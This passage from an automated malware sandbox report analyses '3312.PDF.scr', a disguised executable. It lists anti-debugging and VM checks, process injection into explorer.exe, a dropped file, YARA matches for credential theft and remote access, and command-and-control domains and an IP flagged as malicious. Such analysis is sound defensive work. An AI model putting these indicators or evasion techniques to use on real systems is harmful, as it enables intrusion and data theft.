    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}xeL
    Source: explorer.exe, 00000001.00000000.1743944804.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
    Source: explorer.exe, 00000001.00000000.1743944804.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1744477786.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 0000000A.00000002.2898393777.0000000000DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000k
    Source: explorer.exe, 0000000A.00000003.2731692731.000000000B7BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9507e
    Source: explorer.exe, 0000000A.00000002.2901365364.00000000048C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}exe
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\-
    Source: explorer.exe, 0000000A.00000002.2898393777.0000000000DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: C:\Users\user\Desktop\3312.PDF.scrSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\3312.PDF.scrSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-4046
    Source: C:\Users\user\AppData\Roaming\djjergwDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_5-4137
    Source: C:\Users\user\Desktop\3312.PDF.scrProcess queried: DebugPortJump to behavior
    Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_006A092B mov eax, dword ptr fs:[00000030h]0_2_006A092B
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_006A0D90 mov eax, dword ptr fs:[00000030h]0_2_006A0D90
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0082FE4F push dword ptr fs:[00000030h]0_2_0082FE4F
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_005E092B mov eax, dword ptr fs:[00000030h]5_2_005E092B
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_005E0D90 mov eax, dword ptr fs:[00000030h]5_2_005E0D90
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_006100FF push dword ptr fs:[00000030h]5_2_006100FF

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: djjergw.1.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 45.143.201.14 80Jump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrThread created: C:\Windows\explorer.exe EIP: 34419F0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwThread created: unknown EIP: 87C19F0Jump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 0000000A.00000002.2901365364.0000000004875000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.0000000004875000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.0000000004875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd29B%
    Source: explorer.exe, 00000001.00000000.1742161033.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1741168127.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1741168127.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2904441386.0000000004BD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 0000000A.00000002.2898393777.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Progman
    Source: explorer.exe, 00000001.00000000.1740976335.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1741168127.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1741168127.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00418730 InterlockedCompareExchange,SetFocus,ReadConsoleA,FindAtomA,SearchPathA,GetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameW,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommMask,GetUserObjectInformationW,GetConsoleAliasesLengthW,GetComputerNameW,GetConsoleAliasExesLengthW,GetBinaryType,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,0_2_00418730
    Source: explorer.exe, 0000000A.00000002.2905935716.0000000008E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    32
    Process Injection
    111
    Masquerading
    OS Credential Dumping11
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    33
    Virtualization/Sandbox Evasion
    LSASS Memory631
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection
    Security Account Manager33
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories
    NTDS3
    Process Discovery
    Distributed Component Object ModelInput Capture113
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync23
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523195 Sample: 3312.PDF.scr Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 26 unicexpertmagazine.pw 2->26 28 openclehardware.ru 2->28 30 3 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 8 other signatures 2->48 8 3312.PDF.scr 2->8         started        11 djjergw 2->11         started        13 explorer.exe 21 149 2->13         started        signatures3 process4 signatures5 50 Detected unpacking (changes PE section rights) 8->50 52 Found evasive API chain (may stop execution after checking system information) 8->52 54 Found API chain indicative of debugger detection 8->54 64 5 other signatures 8->64 15 explorer.exe 28 3 8->15 injected 56 Antivirus detection for dropped file 11->56 58 Machine Learning detection for dropped file 11->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->60 62 Query firmware table information (likely to detect VMs) 13->62 process6 dnsIp7 32 unicexpertmagazine.pw 45.143.201.14, 49736, 49738, 49739 PATENT-MEDIA-ASRU Russian Federation 15->32 22 C:\Users\user\AppData\Roaming\djjergw, PE32 15->22 dropped 24 C:\Users\user\...\djjergw:Zone.Identifier, ASCII 15->24 dropped 34 System process connects to network (likely due to code injection or exploit) 15->34 36 Benign windows process drops PE files 15->36 38 Deletes itself after installation 15->38 40 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->40 20 WerFault.exe 21 15->20         started        file8 signatures9 process10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    3312.PDF.scr40%VirustotalBrowse
    3312.PDF.scr100%AviraHEUR/AGEN.1312571
    3312.PDF.scr100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\djjergw100%AviraHEUR/AGEN.1312571
    C:\Users\user\AppData\Roaming\djjergw100%Joe Sandbox ML
    No Antivirus matches
    SourceDetectionScannerLabelLink
    api.msn.com0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    https://api.msn.com/v1/news/Feed/Windows?0%VirustotalBrowse
    https://aka.ms/odirmr0%VirustotalBrowse
    https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
    https://aka.ms/odirm0%VirustotalBrowse
    http://openclehardware.ru/index.php0%VirustotalBrowse
    https://api.msn.com/q0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
    http://ceoconstractionstore.pl/index.php0%VirustotalBrowse
    https://aka.ms/Vh5j3kI0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm0%VirustotalBrowse
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%VirustotalBrowse
    https://word.office.com0%VirustotalBrowse
    https://wns.windows.com/L0%VirustotalBrowse
    http://informcoopirationunicolceo.ru/index.php0%VirustotalBrowse
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    unicexpertmagazine.pw
    45.143.201.14
    truetrue
      unknown
      openclehardware.ru
      unknown
      unknowntrue
        unknown
        informcoopirationunicolceo.ru
        unknown
        unknowntrue
          unknown
          ceoconstractionstore.pl
          unknown
          unknowntrue
            unknown
            api.msn.com
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://openclehardware.ru/index.phptrueunknown
            http://ceoconstractionstore.pl/index.phptrueunknown
            http://informcoopirationunicolceo.ru/index.phptrueunknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000A.00000003.2705554465.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008C9D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1742331928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            http://schemas.miexplorer.exe, 00000001.00000000.1746657492.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://excel.office.comiexplorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://word.office.comCEexplorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2904513919.00000000054FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://bing.cexplorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000000A.00000003.2703067682.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705262424.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2712298809.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711027366.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707506218.0000000008E70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905595416.0000000008020000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                        https://excel.office.comexplorer.exe, 00000001.00000000.1745816371.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.microexplorer.exe, 00000001.00000000.1743054691.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744674085.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1743420076.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://aka.ms/odirmexplorer.exe, 0000000A.00000003.2703383894.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2681117571.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://outlook.comNES-PCexplorer.exe, 0000000A.00000003.2703383894.0000000008C9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704102871.0000000008CC7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D01000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://api.msn.com/qexplorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1745816371.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://aka.ms/Vh5j3kIexplorer.exe, 0000000A.00000003.2703383894.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2707695380.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2681117571.0000000008BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008BFE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1742331928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2664553474.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 0000000A.00000003.2667600786.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2671116139.00000000047FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
